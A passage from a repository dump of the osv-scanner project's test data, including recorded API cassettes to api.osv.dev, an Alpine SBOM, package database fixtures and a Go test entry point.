X-Test-Name: - TestCommand_SubCommands/with_scan_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - 
application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* 
cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* 
sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* 
cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 
524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 
Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.13-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.13-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 
https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" 
================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. 
================================================ FILE: cmd/osv-scanner/scan/testmain_test.go ================================================ package scan_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) /* TestMain is the test entry point for package scan_test. It sets config.OSVScannerConfigName to "osv-scanner-test.toml", sets up the git fixtures, installs the test logger as the slog default, registers scan.Command as the only command under test, runs the tests, then removes the git fixtures and calls testutility.CleanSnapshots. NOTE(review): the error branch calls cleanupGitFixtures() before panic(err); this assumes SetupGitFixtures returns a non-nil cleanup func even when it fails - confirm, otherwise the nil call would mask the original error. The result of m.Run() is not passed to os.Exit here; since Go 1.15 the test wrapper does that itself when TestMain returns. */ func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" cleanupGitFixtures, err := testcmd.SetupGitFixtures() if err != nil { cleanupGitFixtures() panic(err) } slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{scan.Command} m.Run() cleanupGitFixtures() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/testdata/cassettes/Test_run_SubCommands.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - Test_run_SubCommands/scan_with_a_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json 
X-Test-Name: - Test_run_SubCommands/with_no_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - Test_run_SubCommands/with_scan_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/testdata/locks-many/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 
bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* 
sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* 
sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* 